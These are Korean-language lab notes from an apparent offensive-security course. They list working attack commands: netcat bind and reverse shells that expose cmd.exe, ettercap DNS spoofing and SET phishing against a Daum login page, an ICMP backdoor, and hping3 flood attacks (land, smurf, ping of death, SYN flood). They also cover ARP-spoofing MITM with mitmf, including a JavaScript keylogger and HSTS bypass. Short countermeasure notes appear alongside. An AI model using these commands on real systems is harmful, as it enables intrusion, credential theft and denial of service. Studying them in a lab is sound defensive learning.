ip 포워딩
포트 포워딩

fragrouter -B1

--------------------------------------------------------------
DNS spoofing

DNS를 속이는 것, 피싱에 이용가능
DNS 쿼리를 중간에서 확인하여 조작된 DNS 응답을 보내 희생자의 DNS 정보를 스푸핑함

----------------------

leafpad /etc/ettercap/etter.dns

*      A   칼리리눅스ip
#*.microsoft.com    A   107.170.40.56
www.microsoft.com  PTR 107.170.40.56  


SET ( 사회공학적기법)


setoolkit


https://logins.daum.net/accounts/signinform.do

-----------------------------------------------------------------
nc ip port

nc 192.168.195.128 23

netcat을 이용한 쉘 연결

정방향 연결
희생자 : nc -lvp 4444 -e cmd.exe
공격자 : nc win7ip 4444


역방향 연결(reverse connection, reverse shell)

공격자 pc : nc -lvp 4444
희생자 pc : nc 칼리리눅스ip 4444 -e cmd.exe

wget http://70.12.113.49:8080/icmpsh.zip

---------------------------------------------------
icmp 백도어, icmp 은닉채널, icmp 터널링

yum install gcc -y
gcc icmpsh-m.c -o icmpsh
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh

------------------------------------------------------
프록시 서버 : 클라이언트가 자신을 통해서 다른 네트워크 서비스에 간접적으로 접속할 수 있게 해주는 컴퓨터나 응용프로그램을 가리킴

터널링 : 데이터 스트림을 인터넷상에서 가상의 파이프를 통해 전달시키는 기술
        패킷 내에 터널링할 대상을 캡슐화시켜 목적지까지 전송하는 기술

--------------------------------
ssh 터널링

192.168.195.128

===============================
DoS, DDoS

1. land attack  : 패킷을 전송할 때 출발지 ip주소와 목적지 ip 주소 값을 똑같이 만들어서 공격 대상에 보내는 것

hping3 192.168.195.130 -a 192.168.195.130 --icmp --flood

공격자kali : 192.168.195.129
희생자win7 : 192.168.195.130

보안어택 : 최신 OS에는 효과 없음
---------------------------------------------------
2. smurf attack
공격대상의 네트워크에 다이렉트 브로드캐스트를 하면서 브로드캐스트를 보낸 출발지 주소를 공격대상의 ip로 한다. 브로드캐스트에 대한 응답이 공격대상의 ip로 쏟아지면서 공격함

보안대책 : 다이렉트 브로드캐스트를 끈다.

------------------------------------------------
hping3 192.168.195.255 -a 192.168.195.130 --icmp --flood
--------------------------------------------------
ping of death

1. ping을 이용하여 ICMP 패킷의 크기를 정상보다 아주 크게 만듦.
2. 크게 만들어진 패킷은 네트워크를 통해 라우팅되어 공격 네트워크에 도달하는 동안 아주 작은 조각으로 쪼개짐.
3. 공격 대상은 조각화된 패킷을 모두 처리해야 하므로 정상적인 ping보다 부하가 훨씬 많이 걸림.


보안대책 : 반복적으로 들어오는 일정수이상의 icmp 패킷을 무시

hping3 --icmp --rand-source 공격대상ip -d 65000 --flood
hping3 --icmp --rand-source 192.168.195.130 -d 65000 --flood

----------------------------
SYN Flooding Attack : 서버별로 한정되어 있는 접속 가능 공간에 존재하지 않는 클라이언트가 접속한 것처럼 속여 다른 사용자가 서비스를 제공받지 못하게 하는 것

1. 공격자는 많은 숫자의 SYN 패킷을 서버에 보냄
2. 서버는 받은 SYN 패킷에 대한 SYN/ACK 패킷을 각 클라이언트로 보냄
3. 서버는 자신이 보낸 SYN/ACK 패킷에 대한 ACK 패킷을 받지 못함
4. 서버는 세션의 연결을 기다리게 되고 공격은 성공함.

netstat -an | grep :23
hping3 --rand-source 192.168.195.128 -p 23 -S --flood
                                 centosip

netstat -an | grep :23

SYN Flooding 보안 대책
시스템 패치 설치     

침입 탐지 시스템(IDS)이나 침입 차단 시스템(IPS)을 설치

짧은 시간 안에 똑같은 형태의 패킷을 보내는 형태의 공격을 인지했을 경우, 그에 해당하는 IP 주소 대역의 접속을 금지하거나 방화벽 또는 라우터에서 해당 접속을 금지시킴.

서버에서 클라이언트로 보내는 SYN+ACK 패킷에 암호화 기술을 이용해서 인증 정보가 담긴 시퀀스 넘버를 생성하여 클라이언트에 보내는 Syn_Cookie 이용
cat /proc/sys/net/ipv4/tcp_syncookies

백로그큐 크기 키우기
cat /proc/sys/net/ipv4/tcp_max_syn_backlog

ack 대기시간을 줄이는 패치한다.

------------------------------------------------------------
TCP Connect flooding
SYN Flooding Attack이 유효하지 않을시 정상적으로 많은 접속을 맺어 연결접속수를 초과하여 다른 연결들은 접속을 맺지 못하도록 하는 공격

while (:); do nc 공격대상ip 80 & sleep 1;done
-----------------------------------------------
대책 : 같은 ip의 연결을 일정수치까지만 허용한다.
-----------------------------------------------------------


대책 : 일정수 들어오는 패킷을 무시, 
        현재 OS는 어느정도 조치가 되어있다.

------------------------------------
Slow HTTP Header DOS(Slowris)공격
헤더의 마지막을 알리는 Empty Line을 보내지않아 웹서버를 대기시키는 공격

Slow HTTP POST DOS(RUDY) 공격
POST방식으로 데이터를 전송하면서 Content-Length 헤더필드의 값을 비정상적으로 크게 설정한후 소량의 데이터를 지속적으로 천천히 보내 공격하는 기법

저대역폭 공격 대응방법
-> 동일한 ip에서 연결하는 임계치를 제한
-> 타임아웃시간설정
-> 최신 버전의 웹 서버를 사용



DDoS: 대량의 좀비시스템을 이용하여 시스템 거부공격을 수행
         기존의 dos공격을 섞어 공격
         대용량의 대역폭으로 공격한다.
         자동화 툴을 많이 쓴다.



DrDos : 출발지 ip를 공격대상의 ip로 위조한 후 다수의 반사서버에 요청하면 공격대상은 반사서버로부터 다량의 응답을 받아 서비스 거부 공격이 된다.

---------------------------------------------------------------
세션 하이재킹 , MITM

tcp 세션 하이재킹

tcp 세션 : seq넘버, ack넘버

-----------------------------------------------
MITM

-----------------------------
ssh mitm
ssl mitm
-------------------------------------

공격자kali : 192.168.195.129
희생자win7 : 192.168.195.130

칼리리눅스 (mitmf)

mitmf -i eth0 --target 윈7ip --gateway 게이트웨이ip --arp --spoof --upsidedownternet

mitmf -i eth0 --target 192.168.195.130 --gateway 192.168.195.2 --arp --spoof --jskeylogger

---------------------------------------------
HTTP SSL로 암호화 -> HTTPS

SSL MITM

SSL STRIP
SSL 인증서 바꿔치기




ssl strip


HSTS : Client 레벨에서 HTTPS 사용을 강제하는 기법

SSL STRIP+ (bypass hsts)

HSTS

-> 문제점 : 국내사이트가 등록안되있는 경우가 많다.


mitmf -i eth0 --target 192.168.195.130 --gateway 192.168.195.2 --arp --spoof --hsts



